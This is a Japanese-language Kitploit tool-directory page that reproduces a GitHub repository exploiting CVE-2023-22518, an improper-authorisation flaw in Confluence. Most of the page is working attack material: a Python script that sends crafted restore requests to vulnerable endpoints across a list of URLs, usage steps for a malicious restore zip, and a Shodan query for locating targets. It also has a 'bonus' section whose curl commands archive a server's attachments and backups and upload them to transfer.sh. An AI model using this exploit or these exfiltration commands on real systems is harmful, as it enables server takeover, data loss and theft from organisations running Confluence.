Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-22518 — Confluence Data Center および Server における不適切な認可の脆弱性 + bugsBonus 🔥 | Kitploit
ツール/GitHubGitHub/bibo318/cve-2023-22518
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ポストエクスプロイトペネトレーションテスト
GitHubbibo318/cve-2023-22518

CVE-2023-22518

Confluence Data Center および Server における不適切な認可の脆弱性 + bugsBonus 🔥

リポジトリを見る
12年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-22518

Confluence Data Center および Server における不正確な認可の脆弱性。

Atlassian は Confluence の深刻な脆弱性について管理者に警告しました。この脆弱性を悪用するとデータ損失につながる可能性があるため、開発者は直ちにパッチを適用するよう推奨しています。

この脆弱性はデータの漏えいには利用できず、atlassian.net ドメイン経由でアクセスする Atlassian Cloud サイトには影響しないことに注意してください。

脆弱性の詳細情報

Atlassian Jira ページ

製品影響を受けるバージョンパッチ適用済みバージョン
Confluence Data Centerすべてのバージョンが影響を受ける7.19.16 以降
Confluence Server8.3.4 以降
8.4.4 以降
8.5.3 以降
8.6.1 以降

エクスプロイト

タイプ: 不正確な認可

CWE: CWE-285 / CWE-266

ATT&CK: T1548.002

既知の攻撃ベクトル 🔥

/json/setup-restore.action

/json/setup-restore-local.action

/json/setup-restore-progress.action

/server-info.action フォーラム

Python による簡単な脆弱性確認の例

root@kitploit:~
import requests
import random
import string
import argparse
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def random_string(length=10):
    letters = string.ascii_lowercase
    return ''.join(random.choice(letters) for i in range(length))

def post_setup_restore(baseurl):
    paths = ["/json/setup-restore.action", "/json/setup-restore-local.action", "/json/setup-restore-progress.action", "/server-info.action"]
    for path in paths:
        url = f"{baseurl.rstrip('/')}{path}"

        headers = {
            "X-Atlassian-Token": "no-check",
            "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryT3yekvo0rGaL9QR7"
        }

        rand_str = random_string()
        data = (
            "------WebKitFormBoundaryT3yekvo0rGaL9QR7\r\n"
            "Content-Disposition: form-data; name=\"buildIndex\"\r\n\r\n"
            "true\r\n"
            "------WebKitFormBoundaryT3yekvo0rGaL9QR7\r\n"
            f"Content-Disposition: form-data; name=\"file\";filename=\"{rand_str}.zip\"\r\n\r\n"
            f"{rand_str}\r\n"
            "------WebKitFormBoundaryT3yekvo0rGaL9QR7\r\n"
            "Content-Disposition: form-data; name=\"edit\"\r\n\r\n"
            "Upload and import\r\n"
            "------WebKitFormBoundaryT3yekvo0rGaL9QR7--\r\n"
        )

        try:
            response = requests.post(url, headers=headers, data=data.encode('utf-8'), timeout=10, verify=False)

            if (response.status_code == 200 and
                'The zip file did not contain an entry' in response.text and 
                'exportDescriptor.properties' in response.text):
                print(f"[+] Vulnerable to CVE-2023-22518 on host {url}!")
            else:
                print(f"[-] Not vulnerable to CVE-2023-22518 for host {url}.")
        except requests.RequestException as e:
            print(f"[*] Error connecting to {url}. Error: {e}")

def main():
    parser = argparse.ArgumentParser(description="Post setup restore script")
    parser.add_argument('--url', help='The URL to target', required=False)
    parser.add_argument('--file', help='Filename containing a list of URLs', required=False)
    args = parser.parse_args()

    if args.url:
        post_setup_restore(args.url)
    elif args.file:
        with open(args.file, 'r') as f:
            for line in f:
                url = line.strip()
                if url:
                    post_setup_restore(url)
    else:
        print("You must provide either --url or --file argument.")

if __name__ == "__main__":
    main()

エクスプロイトスクリプトの使用方法 🔥

exploit.py

root@kitploit:~
pip install pycryptodome
python3 exploit.py
URL を入力: http://domain/json/setup-restore.action?synchronous=true
.zip ファイルへのパスを入力: /path/xmlexport-20231109-060519-1.zip

BugsBonus 🔥

Shodan 検索:

root@kitploit:~
http.favicon.hash:-305179312

exploit-restore.zip

Confluence バックドアシェルアプリケーション

この脆弱性を利用して Confluence を復元する場合、%CONFLUENCE_HOME%/attachments ディレクトリにはファイルが大量に残っており、数千に達することもあります。それらの抽出は非常に簡単で、拡張子は Linux の file コマンドで判別できます。例:

root@kitploit:~
file /var/lib/confluence/attachments/v4/191/28/77273124/77273124.1
/var/lib/confluence/attachments/v4/191/28/77273124/77273124.1: PNG image data, 442 x 170, 8-bit/color RGBA, non-interlaced

または

file /var/atlassian/application-data/confluence/attachments/v4/114/128/3506237/3506237.1
/var/atlassian/application-data/confluence/attachments/v4/114/128/3506237/3506237.1: PNG image data, 1250 x 674, 8-bit/color RGBA, non-interlaced

ディレクトリを簡単にバックアップしてアーカイブを解凍する例:

root@kitploit:~
tar -czvf /var/atlassian/application-data/confluence/attachments_backup.tar.gz /var/atlassian/application-data/confluence/attachments
curl --upload-file /var/atlassian/application-data/attachments_backup.tar.gz https://transfer.sh/attachments_backup.tar.gz
https://transfer.sh/***********/attachments_backup.tar.gz

または

curl --upload-file /var/atlassian/application-data/confluence/backups/backup-2023_09_26.zip https://transfer.sh/backup-2023_09_26.zip
https://transfer.sh/***********/backup-2023_09_26.zip

Confluence の深刻な脆弱性をパッチ適用後も残る新しいバックドアに関する記事

その他の有用な情報

ツールをダウンロード